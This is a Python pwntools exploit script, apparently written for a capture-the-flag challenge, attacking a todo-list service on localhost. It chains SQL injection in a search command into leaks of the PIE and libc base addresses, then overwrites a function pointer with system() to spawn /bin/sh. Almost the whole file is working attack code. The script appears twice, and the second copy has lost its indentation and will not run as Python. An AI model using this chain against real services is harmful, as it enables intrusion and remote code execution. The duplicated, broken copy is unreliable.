otms61/todos.py

## todos.py
from pwn import *
import struct
from time import sleep

# XXX: use your libc address

#0000000000021dd0 T __libc_start_main
libc_start_main_offset = 0x21dd0
#0000000000046530 W system
libc_system_offset = 0x46530

#$ telescope 0x7f3d20ce1168+0xa00
#0000| 0x7f3d20ce1b68 --> 0x0
#0008| 0x7f3d20ce1b70 --> 0x3
#0016| 0x7f3d20ce1b78 --> 0x7f3d20ae01dc --> 0x6c656800706c6568 ('help')
#0024| 0x7f3d20ce1b80 --> 0x7f3d20ae0162 --> 0x2f7665642f007200 ('')
#0032| 0x7f3d20ce1b88 --> 0x7f3d20adf7a0 (push   rbp)
#0040| 0x7f3d20ce1b90 --> 0x7f3d20ae01e1 ("help: Print this help screen")
#0048| 0x7f3d20ce1b98 --> 0x0
#0056| 0x7f3d20ce1ba0 --> 0x7f3d221bf120 --> 0x7f3d221bf210 --> 0x0
#[+]PIE Base Address: 0x7f3d20ade000

help_string_offset1 = 0x21dc
help_string_offset2 = 0x2162
do_help_offset = 0x17a0

libc_start_main_plt_pie = 0x203070
func_offset = 0x19d0

def rev(s):
    r = ''
    for i in range(0, 16, 2):
        if i == 0:
            r += s[-i-2:]
        else:
            r += s[-i-2:-i]
    return r

def main():
    sleep(0.5)
    login('sato', 'sato')

    print "[*]Stage 1 -- Leak PIE Base Address"
    payload1 = '0x'
    payload1 += rev('000000000000000e')

    sql1 = ""
    sql1 += "qqqq' "
    sql1 += "UNION ALL SELECT 'ZZZZ' " * 10
    sql1 += "UNION ALL SELECT concat({}); -- # ".format(payload1)
    search_content(sql1)
    show(11)  # leak elf header
    f.recvuntil('11: ')
    func_addr_str = f.recv(16).strip()
    func_addr = struct.unpack('<Q', func_addr_str.ljust(8, '\x00'))[0]

    pie_base = func_addr - func_offset
    libc_start_main_plt = pie_base + libc_start_main_plt_pie
    print "[+]Address"
    print "  [+]func Address: {}".format(hex(func_addr))
    print "  [+]PIE Base Address: {}".format(hex(pie_base))
    print "  [+]libc_start_main got.plt Address: {}".format(hex(libc_start_main_plt))

    print "[*]Stage 2 -- Leak libc Base Address"

    help_string1 = '%016x' % (pie_base + help_string_offset1)
    help_string2 = '%016x' % (pie_base + help_string_offset2)
    do_help = '%016x' % (pie_base + do_help_offset)
    libc_start_main_plt_str = '%016x' % libc_start_main_plt
    payload2 = '0x'
    payload2 += rev('000000000000000e')
    payload2 += rev('aaaaaaaabbbbbbbb')
    payload2 += rev(help_string1)  # 'help'
    payload2 += rev(help_string2)  # ''
    payload2 += rev(do_help)
    payload2 += rev(libc_start_main_plt_str)  # help content

    sql2 = ""
    sql2 += "qqqq' "
    sql2 += "UNION ALL SELECT 'ZZZZ' " * 10
    sql2 += "UNION ALL SELECT concat({}); -- #".format(payload2)
    search_content(sql2)
    help()
    f.recvuntil('Commands:\n')
    libc_start_str = f.recvline()[:-1]
    libc_start_main = struct.unpack('<Q', libc_start_str.ljust(8, '\x00'))[0]
    libc_base = libc_start_main - libc_start_main_offset
    libc_system = libc_base + libc_system_offset
    print "[+]Address"
    print "  [+]libc_start_main got addr: {}".format(hex(libc_start_main))
    print "  [+]libc base addr: {}".format(hex(libc_base))
    print "  [+]libc system addr: {}".format(hex(libc_system))

    print "[*]Stage 3 -- Exploit"
    libc_system_str = '%016x' % libc_system
    payload3 = '0x'
    payload3 += rev('000000000000000e')
    payload3 += rev('aaaaaaaabbbbbbbb')
    payload3 += rev(help_string1)  # 'help'
    payload3 += rev(help_string2)  # ''
    payload3 += rev(libc_system_str)  # func pointer

    sql3 = ""
    sql3 += "qqqq' "
    sql3 += "UNION ALL SELECT 'ZZZZ' " * 10
    sql3 += "UNION ALL SELECT concat({}); -- #".format(payload3)
    search_content(sql3)
    f.send('help /bin/sh\n')

    print "[*]Shell"
    f.interactive()

def help():
    f.send('help\n')

def show(num):
    s = 'show {}\n'.format(str(num))
    f.send(s)

def search_content(pattern):
    s = 'search {} \n'.format(pattern)
    f.send(s)

def login(user, passwd):
    s = 'login {} {}\n'.format(user, passwd)
    f.send(s)

def register(user, passwd):
    s = 'register %s %s\n'.format(user, passwd)
    f.send(s)

def add_content(content):
    s = 'add %s\n'.format(content)
    f.send(s)

if __name__ == '__main__':
    f = remote('localhost', 12345)
    main()
	from pwn import *
	import struct
	from time import sleep

	# XXX: use your libc address

	#0000000000021dd0 T __libc_start_main
	libc_start_main_offset = 0x21dd0
	#0000000000046530 W system
	libc_system_offset = 0x46530

	#$ telescope 0x7f3d20ce1168+0xa00
	#0000\| 0x7f3d20ce1b68 --> 0x0
	#0008\| 0x7f3d20ce1b70 --> 0x3
	#0016\| 0x7f3d20ce1b78 --> 0x7f3d20ae01dc --> 0x6c656800706c6568 ('help')
	#0024\| 0x7f3d20ce1b80 --> 0x7f3d20ae0162 --> 0x2f7665642f007200 ('')
	#0032\| 0x7f3d20ce1b88 --> 0x7f3d20adf7a0 (push rbp)
	#0040\| 0x7f3d20ce1b90 --> 0x7f3d20ae01e1 ("help: Print this help screen")
	#0048\| 0x7f3d20ce1b98 --> 0x0
	#0056\| 0x7f3d20ce1ba0 --> 0x7f3d221bf120 --> 0x7f3d221bf210 --> 0x0
	#[+]PIE Base Address: 0x7f3d20ade000

	help_string_offset1 = 0x21dc
	help_string_offset2 = 0x2162
	do_help_offset = 0x17a0

	libc_start_main_plt_pie = 0x203070
	func_offset = 0x19d0

	def rev(s):
	r = ''
	for i in range(0, 16, 2):
	if i == 0:
	r += s[-i-2:]
	else:
	r += s[-i-2:-i]
	return r

	def main():
	sleep(0.5)
	login('sato', 'sato')

	print "[*]Stage 1 -- Leak PIE Base Address"
	payload1 = '0x'
	payload1 += rev('000000000000000e')

	sql1 = ""
	sql1 += "qqqq' "
	sql1 += "UNION ALL SELECT 'ZZZZ' " * 10
	sql1 += "UNION ALL SELECT concat({}); -- # ".format(payload1)
	search_content(sql1)
	show(11) # leak elf header
	f.recvuntil('11: ')
	func_addr_str = f.recv(16).strip()
	func_addr = struct.unpack('<Q', func_addr_str.ljust(8, '\x00'))[0]

	pie_base = func_addr - func_offset
	libc_start_main_plt = pie_base + libc_start_main_plt_pie
	print "[+]Address"
	print " [+]func Address: {}".format(hex(func_addr))
	print " [+]PIE Base Address: {}".format(hex(pie_base))
	print " [+]libc_start_main got.plt Address: {}".format(hex(libc_start_main_plt))

	print "[*]Stage 2 -- Leak libc Base Address"

	help_string1 = '%016x' % (pie_base + help_string_offset1)
	help_string2 = '%016x' % (pie_base + help_string_offset2)
	do_help = '%016x' % (pie_base + do_help_offset)
	libc_start_main_plt_str = '%016x' % libc_start_main_plt
	payload2 = '0x'
	payload2 += rev('000000000000000e')
	payload2 += rev('aaaaaaaabbbbbbbb')
	payload2 += rev(help_string1) # 'help'
	payload2 += rev(help_string2) # ''
	payload2 += rev(do_help)
	payload2 += rev(libc_start_main_plt_str) # help content

	sql2 = ""
	sql2 += "qqqq' "
	sql2 += "UNION ALL SELECT 'ZZZZ' " * 10
	sql2 += "UNION ALL SELECT concat({}); -- #".format(payload2)
	search_content(sql2)
	help()
	f.recvuntil('Commands:\n')
	libc_start_str = f.recvline()[:-1]
	libc_start_main = struct.unpack('<Q', libc_start_str.ljust(8, '\x00'))[0]
	libc_base = libc_start_main - libc_start_main_offset
	libc_system = libc_base + libc_system_offset
	print "[+]Address"
	print " [+]libc_start_main got addr: {}".format(hex(libc_start_main))
	print " [+]libc base addr: {}".format(hex(libc_base))
	print " [+]libc system addr: {}".format(hex(libc_system))

	print "[*]Stage 3 -- Exploit"
	libc_system_str = '%016x' % libc_system
	payload3 = '0x'
	payload3 += rev('000000000000000e')
	payload3 += rev('aaaaaaaabbbbbbbb')
	payload3 += rev(help_string1) # 'help'
	payload3 += rev(help_string2) # ''
	payload3 += rev(libc_system_str) # func pointer

	sql3 = ""
	sql3 += "qqqq' "
	sql3 += "UNION ALL SELECT 'ZZZZ' " * 10
	sql3 += "UNION ALL SELECT concat({}); -- #".format(payload3)
	search_content(sql3)
	f.send('help /bin/sh\n')

	print "[*]Shell"
	f.interactive()

	def help():
	f.send('help\n')

	def show(num):
	s = 'show {}\n'.format(str(num))
	f.send(s)

	def search_content(pattern):
	s = 'search {} \n'.format(pattern)
	f.send(s)

	def login(user, passwd):
	s = 'login {} {}\n'.format(user, passwd)
	f.send(s)

	def register(user, passwd):
	s = 'register %s %s\n'.format(user, passwd)
	f.send(s)

	def add_content(content):
	s = 'add %s\n'.format(content)
	f.send(s)

	if __name__ == '__main__':
	f = remote('localhost', 12345)
	main()